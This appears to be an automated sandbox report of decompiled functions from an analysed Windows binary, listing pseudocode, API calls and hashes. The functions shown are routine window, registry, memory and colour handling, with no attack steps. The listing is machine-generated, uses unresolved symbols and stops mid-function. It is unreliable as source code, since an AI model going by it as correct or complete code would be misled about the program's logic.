                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00416D44 Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 80%
                                                                                                                            			E00416D44(void* __ebx, void* __ecx, void* __edx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				void* _t40;
				intOrPtr _t42;
				void* _t43;
				void* _t45;
				intOrPtr _t46;
				void* _t47;

				_t40 = __edx;
				_t39 = __ecx;
				_t36 = __ebx;
				_t42 =  *((intOrPtr*)(_t47 + 0x10));
				if(_t42 == 0) {
					_t46 =  *((intOrPtr*)(_t47 + 0x10));
					L14:
					_t43 = E0040A17C(_t36, _t40, _t46, GetTopWindow( *(_t46 + 0x20)));
					if(_t43 != 0) {
						L7:
						if((GetWindowLongA( *(_t43 + 0x20), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t43;
						}
						_push(_t36);
						_t37 =  *(_t47 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t43 + 0x20)) != 0) {
							if((_t37 & 0x00000002) == 0) {
								L16:
								_push(_t37);
								_push(0);
								_push(_t43);
								goto L17;
							}
							_t39 = _t43;
							if(E0040CF40(_t43) != 0) {
								goto L16;
							}
							goto L12;
						} else {
							L12:
							_push(_t37);
							_push(_t43);
							_push(_t46);
							L17:
							_t43 = E00416D44(_t37, _t39, _t40);
							goto L18;
						}
					}
					return _t46;
				}
				_t28 = E0040A17C(__ebx, _t40, _t45, GetWindow( *(_t42 + 0x20), 2));
				_t46 =  *((intOrPtr*)(_t47 + 0x10));
				while(_t28 == 0) {
					_t42 = E00416CEF(_t46, E0040A17C(_t36, _t40, _t46, GetParent( *(_t42 + 0x20))));
					if(_t42 == 0 || _t42 == _t46) {
						goto L14;
					} else {
						_t28 = E0040A17C(_t36, _t40, _t46, GetWindow( *(_t42 + 0x20), 2));
						continue;
					}
				}
				_t43 = E0040A17C(_t36, _t40, _t46, GetWindow( *(_t42 + 0x20), 2));
				goto L7;
			}













                                                                                                                            0x00416d44
                                                                                                                            0x00416d44
                                                                                                                            0x00416d44
                                                                                                                            0x00416d46
                                                                                                                            0x00416d4d
                                                                                                                            0x00416ded
                                                                                                                            0x00416df1
                                                                                                                            0x00416e00
                                                                                                                            0x00416e04
                                                                                                                            0x00416daf
                                                                                                                            0x00416dbf
                                                                                                                            0x00416e16
                                                                                                                            0x00000000
                                                                                                                            0x00416e16
                                                                                                                            0x00416dc1
                                                                                                                            0x00416dc2
                                                                                                                            0x00416dc9
                                                                                                                            0x00416ddb
                                                                                                                            0x00416e0a
                                                                                                                            0x00416e0a
                                                                                                                            0x00416e0b
                                                                                                                            0x00416e0d
                                                                                                                            0x00000000
                                                                                                                            0x00416e0d
                                                                                                                            0x00416ddd
                                                                                                                            0x00416de6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00416de8
                                                                                                                            0x00416de8
                                                                                                                            0x00416de8
                                                                                                                            0x00416de9
                                                                                                                            0x00416dea
                                                                                                                            0x00416e0e
                                                                                                                            0x00416e13
                                                                                                                            0x00000000
                                                                                                                            0x00416e15
                                                                                                                            0x00416dc9
                                                                                                                            0x00000000
                                                                                                                            0x00416e06
                                                                                                                            0x00416d62
                                                                                                                            0x00416d67
                                                                                                                            0x00416d9b
                                                                                                                            0x00416d83
                                                                                                                            0x00416d87
                                                                                                                            0x00000000
                                                                                                                            0x00416d8d
                                                                                                                            0x00416d96
                                                                                                                            0x00000000
                                                                                                                            0x00416d96
                                                                                                                            0x00416d87
                                                                                                                            0x00416dad
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$LongParentVisible
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 506644340-0
                                                                                                                            • Opcode ID: c16a7245de4e2cf9f9c55ae43318f1fbf2af0df38388ae640e0a9e9e27eec306
                                                                                                                            • Instruction ID: aacadc66b0c24ea976714d951d239eb90fc7933b27c1400a6379e7826ad4c932
                                                                                                                            • Opcode Fuzzy Hash: c16a7245de4e2cf9f9c55ae43318f1fbf2af0df38388ae640e0a9e9e27eec306
                                                                                                                            • Instruction Fuzzy Hash: 0421F5327003106BC7316B799C09FAB76ACBF44755F07062EF945AB292D62CDC9087A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404604 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00404604(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}









                                                                                                                            0x0040461f
                                                                                                                            0x00404626
                                                                                                                            0x00404629
                                                                                                                            0x0040462c
                                                                                                                            0x0040462f
                                                                                                                            0x0040463a
                                                                                                                            0x00404671
                                                                                                                            0x00404671
                                                                                                                            0x0040467c
                                                                                                                            0x00404681
                                                                                                                            0x00404681
                                                                                                                            0x00404686
                                                                                                                            0x0040468b
                                                                                                                            0x0040468b
                                                                                                                            0x00404694

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 00404632
                                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00404655
                                                                                                                            • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00404671
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00404681
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0040468B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseCreate$Open
                                                                                                                            • String ID: software
                                                                                                                            • API String ID: 1740278721-2010147023
                                                                                                                            • Opcode ID: ea757d94039981acd0b7a3dd96007549f2cc8e3e3a7d77113d0533629f158fa6
                                                                                                                            • Instruction ID: 61be865df32934551d603d79ded126abba69cd9ab8008e77592b6c8646ee9ac4
                                                                                                                            • Opcode Fuzzy Hash: ea757d94039981acd0b7a3dd96007549f2cc8e3e3a7d77113d0533629f158fa6
                                                                                                                            • Instruction Fuzzy Hash: 5511E676D00118FBCB21DF9ACC84DDFBFBCEF85710B1000AAA600A2225D3759A40EBA4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040E634 Relevance: 10.6, APIs: 7, Instructions: 51memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 80%
                                                                                                                            			E0040E634(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E00420866(0, 0);
				_t22 = E004014F0(__edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E0040D87C(_t33);
				}
				 *(_t41 + 0xc) = _t23;
				E0041EC90(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E0041EA59(_t28);
			}











                                                                                                                            0x0040e634
                                                                                                                            0x0040e634
                                                                                                                            0x0040e63b
                                                                                                                            0x0040e645
                                                                                                                            0x0040e651
                                                                                                                            0x0040e657
                                                                                                                            0x0040e65c
                                                                                                                            0x0040e664
                                                                                                                            0x0040e669
                                                                                                                            0x0040e66f
                                                                                                                            0x0040e66f
                                                                                                                            0x0040e677
                                                                                                                            0x0040e688
                                                                                                                            0x0040e694
                                                                                                                            0x0040e699
                                                                                                                            0x0040e69f
                                                                                                                            0x0040e6a2
                                                                                                                            0x0040e6a7
                                                                                                                            0x0040e6b1
                                                                                                                            0x0040e6b1
                                                                                                                            0x0040e6b4
                                                                                                                            0x0040e6ba
                                                                                                                            0x0040e6c5

                                                                                                                            APIs
                                                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0040E63B
                                                                                                                            • __CxxThrowException@8.LIBCMT ref: 0040E645
                                                                                                                              • Part of subcall function 00420866: RaiseException.KERNEL32(?,?,00000008,?), ref: 004208A6
                                                                                                                            • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,0040707C,00405A19,00402E5A,?,?,00401084), ref: 0040E65C
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0040707C,00405A19,00402E5A,?,?,00401084), ref: 0040E669
                                                                                                                              • Part of subcall function 0040D87C: __CxxThrowException@8.LIBCMT ref: 0040D890
                                                                                                                            • _memset.LIBCMT ref: 0040E688
                                                                                                                            • TlsSetValue.KERNEL32(?,00000000,?,4917EADC), ref: 0040E699
                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0040707C,00405A19,00402E5A,?,?,00401084), ref: 0040E6BA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 356813703-0
                                                                                                                            • Opcode ID: aef2872b7fa825d309e5a53faa2b81f990e85927fc9847993ef216f5b3734d50
                                                                                                                            • Instruction ID: 0c59fc111bb8fa5fa7d933da38eebf55e0a7fb2b535e3d1ba030546680dd6cd1
                                                                                                                            • Opcode Fuzzy Hash: aef2872b7fa825d309e5a53faa2b81f990e85927fc9847993ef216f5b3734d50
                                                                                                                            • Instruction Fuzzy Hash: 95118270500205AFDB10AF65DC86D2BBBB5FF50318750C93EF455A66A2CB35AD60CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041803A Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0041803A(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}





                                                                                                                            0x00418044
                                                                                                                            0x0041804a
                                                                                                                            0x00418051
                                                                                                                            0x00418058
                                                                                                                            0x0041805f
                                                                                                                            0x0041806c
                                                                                                                            0x00418073
                                                                                                                            0x00418076
                                                                                                                            0x00418079
                                                                                                                            0x0041807d

                                                                                                                            APIs
                                                                                                                            • GetSysColor.USER32(0000000F), ref: 00418046
                                                                                                                            • GetSysColor.USER32(00000010), ref: 0041804D
                                                                                                                            • GetSysColor.USER32(00000014), ref: 00418054
                                                                                                                            • GetSysColor.USER32(00000012), ref: 0041805B
                                                                                                                            • GetSysColor.USER32(00000006), ref: 00418062
                                                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0041806F
                                                                                                                            • GetSysColorBrush.USER32(00000006), ref: 00418076
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Color$Brush
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2798902688-0
                                                                                                                            • Opcode ID: 802ba21595b178bd1a7165f36875ec1a1f1de4a6a00e0abf7f705ba198024cb1
                                                                                                                            • Instruction ID: 23e90ffdbc4e06ce21ee1c56a9b3a1ab3b64a7da3a2e7f0a32339f5e33b0d897
                                                                                                                            • Opcode Fuzzy Hash: 802ba21595b178bd1a7165f36875ec1a1f1de4a6a00e0abf7f705ba198024cb1
                                                                                                                            • Instruction Fuzzy Hash: 14F01C719407489BD730BF769D09B47BAE5FFC4B10F02192EE2818BA90E6B6E040DF44
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0043267E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24registryclipboardCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0043267E() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x4446c4 =  *0x4446c4 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
					 *0x4446c4 = _t6;
					return _t6;
				}
			}





                                                                                                                            0x0043268f
                                                                                                                            0x00432699
                                                                                                                            0x0043269d
                                                                                                                            0x004326b9
                                                                                                                            0x004326b9
                                                                                                                            0x00000000
                                                                                                                            0x004326b9
                                                                                                                            0x0043269f
                                                                                                                            0x004326a5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004326a7
                                                                                                                            0x004326a7
                                                                                                                            0x004326ac
                                                                                                                            0x004326b2
                                                                                                                            0x00000000
                                                                                                                            0x004326b2

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Version$ClipboardFormatRegister
                                                                                                                            • String ID: MSWHEEL_ROLLMSG
                                                                                                                            • API String ID: 2888461884-2485103130
                                                                                                                            • Opcode ID: fb4b88f3953ba871b9f0983d7db0fc09e0c71b617b8409537c2d5d13917e861a
                                                                                                                            • Instruction ID: f3fa9b5d34951f37cece904dc8ff163874d335bd5cbc76c66a2bd33522b533dd
                                                                                                                            • Opcode Fuzzy Hash: fb4b88f3953ba871b9f0983d7db0fc09e0c71b617b8409537c2d5d13917e861a
                                                                                                                            • Instruction Fuzzy Hash: 8BE0263E80203246D7112B24AE0236A36A45F8D361F55203BCD00433748EBC48434EBE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041635F Relevance: 9.4, APIs: 6, Instructions: 404COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 83%
                                                                                                                            			E0041635F(void* __ebx, void* __ecx, signed short __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t163;
				signed short _t178;
				signed int _t184;
				signed short _t185;
				intOrPtr* _t187;
				void* _t189;
				signed short _t198;
				signed short _t200;
				signed int _t203;
				signed short _t206;
				signed short _t213;
				signed short _t215;
				signed short _t224;
				long long* _t231;
				intOrPtr* _t235;
				void* _t237;
				void* _t243;
				void* _t246;
				intOrPtr* _t248;
				void* _t254;
				void* _t257;
				signed int _t260;
				signed short _t261;
				signed short _t262;
				signed short _t266;
				signed short _t270;
				intOrPtr* _t271;
				void* _t281;
				signed short _t295;
				void* _t339;
				void* _t340;
				signed short _t342;
				void* _t343;
				intOrPtr* _t344;
				signed int _t345;
				void* _t347;
				signed long long _t357;

				_t337 = __edx;
				_t282 = __ecx;
				_t345 = _t347 - 0x64;
				_t163 =  *0x441590; // 0x4917eadc
				 *(_t345 + 0x68) = _t163 ^ _t345;
				_push(0xcc);
				E0041E981(E00431D03, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t345 + 0x4c)) =  *((intOrPtr*)(_t345 + 0x74));
				_t339 = __ecx;
				 *(_t345 + 0x30) = 0;
				if((0 |  *((intOrPtr*)(__ecx + 0x48)) != 0x00000000) == 0) {
					L1:
					E0040D8B0(_t282);
				}
				if((0 |  *((intOrPtr*)(_t339 + 0x54)) != 0x00000000) == 0) {
					goto L1;
				}
				E0041A21A(_t345 + 0x3c);
				_t342 = 3;
				 *((intOrPtr*)(_t345 - 4)) = 0;
				 *(_t345 + 0x50) = _t342;
				E00413E85(0,  *((intOrPtr*)(_t339 + 0x54)),  *((intOrPtr*)(_t345 + 0x78)), _t345 + 0x50);
				if( *(_t345 + 0x50) != _t342) {
					_t178 = E00411F61(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)), _t345 + 0x50);
					__eflags = _t178;
					if(_t178 == 0) {
						goto L4;
					} else {
						_t184 =  *(_t345 + 0x50) & 0x0000ffff;
						_t344 = __imp__#9;
						__eflags = _t184 - 0x81;
						if(__eflags > 0) {
							_t185 = _t184 - 0x82;
							__eflags = _t185;
							if(__eflags == 0) {
								goto L50;
							} else {
								_t198 = _t185 - 1;
								__eflags = _t198;
								if(__eflags == 0) {
									_t200 = E00413BCA(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)), _t345 + 0x54);
									__eflags = _t200;
									if(_t200 != 0) {
										__eflags =  *(_t345 + 0x55);
										asm("fild qword [ebp+0x57]");
										if( *(_t345 + 0x55) > 0) {
											do {
												_t139 = _t345 + 0x55;
												 *_t139 =  *(_t345 + 0x55) - 1;
												__eflags =  *_t139;
												_t357 = _t357 /  *0x4353f8;
											} while ( *_t139 != 0);
										}
										__eflags =  *(_t345 + 0x56);
										if( *(_t345 + 0x56) == 0) {
											asm("fchs");
										}
										 *(_t345 - 0x14) = _t357;
										 *(_t345 - 0x1c) = 5;
										 *((char*)(_t345 - 4)) = 0xe;
										E0041A1FA(_t345 - 0x1c, _t345 + 0x3c, _t345 - 0x1c);
										_t203 = _t345 - 0x1c;
										goto L30;
									}
								} else {
									_t206 = _t198;
									__eflags = _t206;
									if(__eflags == 0) {
										__eflags = E00413BF4(_t339, _t344, __eflags,  *((intOrPtr*)(_t345 + 0x78)), _t345 + 0x34);
										if(__eflags != 0) {
											asm("fldz");
											 *(_t345 + 0x58) = _t357;
											_t337 =  *(_t345 + 0x34);
											 *((intOrPtr*)(_t345 + 0x60)) = 0;
											E00411E00(_t345 + 0x58, _t339, __eflags,  *(_t345 + 0x34),  *(_t345 + 0x36) & 0x0000ffff,  *(_t345 + 0x38) & 0x0000ffff, 0, 0, 0);
											 *_t345 = 7;
											 *(_t345 + 8) =  *(_t345 + 0x58);
											 *((char*)(_t345 - 4)) = 0xf;
											E0041A1FA(_t345, _t345 + 0x3c, _t345);
											_t203 = _t345;
											goto L30;
										}
									} else {
										_t213 = _t206 - 1;
										__eflags = _t213;
										if(__eflags == 0) {
											_t215 = E00413BF4(_t339, _t344, __eflags,  *((intOrPtr*)(_t345 + 0x78)), _t345 + 0x34);
											__eflags = _t215;
											if(_t215 != 0) {
												asm("fldz");
												 *(_t345 + 0x58) = _t357;
												 *((intOrPtr*)(_t345 + 0x60)) = 0;
												E00411E60( *(_t345 + 0x34) & 0x0000ffff,  *(_t345 + 0x36) & 0x0000ffff,  *(_t345 + 0x38) & 0x0000ffff);
												 *(_t345 - 0x4c) = 7;
												 *(_t345 - 0x44) =  *(_t345 + 0x58);
												 *((char*)(_t345 - 4)) = 0x10;
												E0041A1FA(_t345 - 0x4c, _t345 + 0x3c, _t345 - 0x4c);
												_t203 = _t345 - 0x4c;
												goto L30;
											}
										} else {
											__eflags = _t213 - 1;
											if(__eflags == 0) {
												_t224 = E00413C29(_t339, _t344, __eflags,  *((intOrPtr*)(_t345 + 0x78)), _t345 + 0x54);
												__eflags = _t224;
												if(_t224 != 0) {
													_t231 = E00413DD5(_t345 - 0xd8,  *((short*)(_t345 + 0x54)),  *(_t345 + 0x56) & 0x0000ffff,  *(_t345 + 0x58) & 0x0000ffff,  *(_t345 + 0x5a) & 0x0000ffff,  *(_t345 + 0x5c) & 0x0000ffff,  *(_t345 + 0x5e) & 0x0000ffff);
													 *(_t345 - 0x3c) = 7;
													 *((long long*)(_t345 - 0x34)) =  *_t231;
													 *((char*)(_t345 - 4)) = 0x11;
													E0041A1FA(_t345 - 0x3c, _t345 + 0x3c, _t345 - 0x3c);
													_t203 = _t345 - 0x3c;
													goto L30;
												}
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t235 = E00403615(0, _t345 + 0x50, _t339, _t344, __eflags);
								 *((char*)(_t345 - 4)) = 2;
								_t237 = E0041A4B4(0, _t345 - 0xbc, _t339, _t344, __eflags);
								 *((char*)(_t345 - 4)) = 3;
								E0041A1FA(_t237, _t345 + 0x3c, _t237);
								 *_t344(_t345 - 0xbc,  *_t235, 8, E00411F92(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78))));
								_t295 =  *(_t345 + 0x50);
								goto L51;
							} else {
								__eflags = _t184 - 8;
								if(__eflags > 0) {
									__eflags = _t184 - 0xb;
									if(__eflags == 0) {
										_t243 = E0041A143(_t345 - 0x9c,  *(E00411F92(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)))) & 0x0000ffff, 0xb);
										 *((char*)(_t345 - 4)) = 0xb;
										E0041A1FA(_t243, _t345 + 0x3c, _t243);
										_t203 = _t345 - 0x9c;
										goto L30;
									} else {
										__eflags = _t184 - 0xc;
										if(__eflags == 0) {
											_t246 = E0041A3B8(0, _t345 - 0x8c, _t339, E00411F92(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78))));
											 *((char*)(_t345 - 4)) = 1;
											E0041A1FA(_t246, _t345 + 0x3c, _t246);
											_t203 = _t345 - 0x8c;
											goto L30;
										} else {
											__eflags = _t184 - 0xf;
											if(_t184 > 0xf) {
												__eflags = _t184 - 0x11;
												if(__eflags <= 0) {
													_t248 = E00411F92(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)));
													 *(_t345 - 0x5c) = 0x11;
													 *((char*)(_t345 - 0x54)) =  *_t248;
													 *((char*)(_t345 - 4)) = 6;
													E0041A1FA(_t345 - 0x5c, _t345 + 0x3c, _t345 - 0x5c);
													_t203 = _t345 - 0x5c;
													goto L30;
												} else {
													__eflags = _t184 - 0x12;
													if(__eflags == 0) {
														goto L27;
													} else {
														__eflags = _t184 - 0x13;
														if(__eflags == 0) {
															goto L26;
														}
													}
												}
											}
										}
									}
								} else {
									if(__eflags == 0) {
										L50:
										_t187 = E0040DD5B(0, _t345 + 0x30, _t339, _t344, __eflags);
										 *((char*)(_t345 - 4)) = 4;
										_t189 = E0041A4B4(0, _t345 - 0xcc, _t339, _t344, __eflags);
										 *((char*)(_t345 - 4)) = 5;
										E0041A1FA(_t189, _t345 + 0x3c, _t189);
										 *_t344(_t345 - 0xcc,  *_t187, 8, E00411F92(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78))));
										_t295 =  *(_t345 + 0x30);
										L51:
										__eflags = _t295 + 0xfffffff0;
										 *((char*)(_t345 - 4)) = 0;
										E00402C55(_t295 + 0xfffffff0, _t337);
									} else {
										_t260 = _t184;
										__eflags = _t260;
										if(__eflags == 0) {
											L27:
											_t254 = E0041A143(_t345 - 0xac,  *(E00411F92(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)))) & 0x0000ffff, 2);
											 *((char*)(_t345 - 4)) = 7;
											E0041A1FA(_t254, _t345 + 0x3c, _t254);
											_t203 = _t345 - 0xac;
											goto L30;
										} else {
											_t261 = _t260 - 1;
											__eflags = _t261;
											if(__eflags == 0) {
												L26:
												_t257 = E0041A16A(_t345 - 0x7c,  *(E00411F92(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78)))), 3);
												 *((char*)(_t345 - 4)) = 8;
												E0041A1FA(_t257, _t345 + 0x3c, _t257);
												_t203 = _t345 - 0x7c;
												goto L30;
											} else {
												_t262 = _t261 - 1;
												__eflags = _t262;
												if(__eflags == 0) {
													 *(_t345 + 0x50) =  *(E00411F92(_t339, __eflags,  *((intOrPtr*)(_t345 + 0x78))));
													 *(_t345 + 0x10) = 4;
													 *(_t345 + 0x18) =  *(_t345 + 0x50);
													 *((char*)(_t345 - 4)) = 9;
													E0041A1FA(_t345 + 0x10, _t345 + 0x3c, _t345 + 0x10);
													_t203 = _t345 + 0x10;
													goto L30;
												} else {
													_t266 = _t262 - 1;
													__eflags = _t266;
													if(__eflags == 0) {
